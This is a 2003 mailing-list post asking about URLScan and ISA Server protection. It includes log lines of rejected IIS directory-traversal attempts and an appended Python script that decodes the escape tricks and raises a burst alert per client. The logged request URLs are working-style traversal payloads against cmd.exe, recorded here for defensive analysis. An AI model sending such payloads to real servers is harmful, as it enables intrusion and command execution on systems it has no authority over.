FW: WEB server URLSCAN logs

  • From: "Darryl Janetzki" <darrylj@xxxxxxxxxxxxxxxx>
  • To: <isalist@xxxxxxxxxxxxx>
  • Date: Wed, 2 Jul 2003 00:48:52 +1000

Please find attached a sample of the URLSCAN log on an internal WWW
server that has been published with ISA server.
 
The ISA server has SP1 and the URLSCAN filter enabled. The local server
has the URLSCAN filter also.
My first question is: why did these attempts pass the ISA server? I was
of the opinion that the published and internal web servers would be
protected by this filter. Any suggestions on resolving this? And perhaps
a "white hat" site for testing ISA security for these types of attacks?
The last question is: is it possible to create a "special content
filter" to filter this type of traffic, and an alert when this activity
is happening, to protect IIS services? I
This attack went on for several days. It would have been an advantage to
have had an alarm that an attack was underway.
My current strategy is to create a filter for each offending site.
 
 
Thanks
Darryl
 
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/iisadmpwd/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%c0%9v../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/iisadmpwd/..%f8%80%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/iisadmpwd/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/iisadmpwd/..%fc%80%80%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/iisadmpwd/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%c1%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%f0%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%u002e..%u002e/winnt/system32/cmd.exe'
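Added example (Python), not from the post and not part of URLScan or ISA Server: a small decoder that shows what the escape tricks in the log lines above were aiming at, and the per-client alarm the post asks for, run over sample URLScan reject lines. Assumptions: SAMPLE_LOG is constructed in the post's line format, keeping one line per encoding variant and the same client address, plus a made-up request from 10.0.0.5 to show a client that does not trip the alarm; lenient_utf8 accepts any 2..6 byte UTF-8 form, which is the behaviour overlong sequences such as %c0%af or %fc%80%80%80%80%af rely on; classify goes beyond the page's lines by also running a second decode pass, so the %255c double-encoded form (constructed here, not in the post) is covered; %c0%9v and %c0%qf contain non-hex digits, so they are left verbatim and tagged rather than guessed at. The threshold and window in scan_log are arbitrary starting values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample, in the URLScan reject-line format used in the post (one line per
# encoding variant, plus a request from a made-up internal address that should not alarm).
SAMPLE_LOG = """\
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/iisadmpwd/..%f8%80%80%80%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%c0%9v../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/iisadmpwd/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe'
[06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%c1%af../winnt/system32/cmd.exe'
[06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/PBServer/..%u002e..%u002e/winnt/system32/cmd.exe'
[06-30-2003 - 05:40:00] Client at 10.0.0.5: URL contains sequence '..', which is disallowed. Request will be rejected.  Site Instance='1', Raw URL='/images/../index.htm'
"""

LOG_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] Client at (?P<ip>[\d.]+): (?P<reason>.*?)\s+"
                    r"Site Instance='(?P<site>\d+)', Raw URL='(?P<url>[^']*)'")
ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")   # IIS-style %uXXXX, then %XX
# (lead-byte low bound, high bound, sequence length) for the 2..6 byte UTF-8 forms
_LEAD = ((0xC0, 0xE0, 2), (0xE0, 0xF0, 3), (0xF0, 0xF8, 4), (0xF8, 0xFC, 5), (0xFC, 0xFE, 6))
_SHORTEST = (0, 0, 0x80, 0x800, 0x10000, 0x200000, 0x4000000)  # smallest cp each form may carry
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")          # '..' as its own path segment


def percent_decode(url):
    """One decoding pass: %XX -> raw byte, IIS-specific %uXXXX -> code point (as UTF-8).
    A '%' not followed by valid hex (the post's %c0%9v, %c0%qf) is kept verbatim and
    reported as malformed instead of being guessed at."""
    out, malformed, i = bytearray(), False, 0
    while i < len(url):
        m = ESC_RE.match(url, i) if url[i] == "%" else None
        if m:
            if m.group(1):
                out += chr(int(m.group(1), 16)).encode("utf-8")
            else:
                out.append(int(m.group(2), 16))
            i = m.end()
            continue
        malformed |= url[i] == "%"
        out += url[i].encode("utf-8")
        i += 1
    return bytes(out), malformed


def lenient_utf8(data):
    """Decode UTF-8 the way a permissive decoder does: any 2..6 byte form is accepted even
    when longer than needed, so %c0%af and %fc%80%80%80%80%af both become '/'.
    Returns (text, saw_overlong). Bytes forming no sequence map 1:1 to U+0080..U+00FF."""
    out, overlong, i = [], False, 0
    while i < len(data):
        b = data[i]
        n = next((n for lo, hi, n in _LEAD if lo <= b < hi), 0) if b >= 0x80 else 0
        tail = data[i + 1:i + n]
        if n and len(tail) == n - 1 and all(0x80 <= t < 0xC0 for t in tail):
            cp = b & (0x7F >> n)                 # payload bits of the lead byte
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            overlong |= cp < _SHORTEST[n]
            out.append(chr(cp) if cp < 0x110000 else "\ufffd")
            i += n
        else:
            out.append(chr(b))
            i += 1
    return "".join(out), overlong


def classify(url):
    """Decode twice (the second pass mirrors double decoding, e.g. %255c -> %5c -> '\\')
    and tag what the request relied on. Returns {"decoded": str, "tags": set}."""
    tags = set()
    if "%u" in url.lower():
        tags.add("unicode-%u")
    raw, malformed = percent_decode(url)
    once, overlong = lenient_utf8(raw)
    twice, _ = lenient_utf8(percent_decode(once)[0])
    if malformed:
        tags.add("malformed-escape")
    if overlong:
        tags.add("overlong-utf8")
    if twice != once:
        tags.add("double-decoded")
    if TRAVERSAL_RE.search(twice):
        tags.add("traversal")
    return {"decoded": twice, "tags": tags}


def scan_log(text, threshold=3, window_seconds=60):
    """Group URLScan reject lines by client and fire one alert for any client that produced
    at least `threshold` rejects inside a `window_seconds` span (values are assumptions)."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits[m["ip"]].append((datetime.strptime(m["ts"], "%m-%d-%Y - %H:%M:%S"), m["url"]))
    alerts = []
    for ip, events in hits.items():
        events.sort()
        start = 0
        for end, (ts, _) in enumerate(events):
            while (ts - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                tags = set().union(*(classify(u)["tags"] for _, u in events))
                alerts.append({"ip": ip, "rejects": len(events), "first": events[0][0].isoformat(),
                               "last": events[-1][0].isoformat(), "tags": sorted(tags)})
                break
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    for line in SAMPLE_LOG.splitlines():
        url = LOG_RE.match(line)["url"]
        print(url, "->", classify(url))
```

Two things worth noticing when this runs. URLScan's own reason text says it rejected on the literal '..' in the raw URL, so every line was caught before any decoding happened; the decoder is there to show intent and to enrich the alert, not to replace that rule. And not every variant actually yields a separator under a bit-accurate decoder (%c1%af comes out as 'o', %u002e only adds dots), which is what a scanner spraying a fixed list looks like; the alarm therefore keys on the burst of rejects per client, not on whether each request would have worked.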
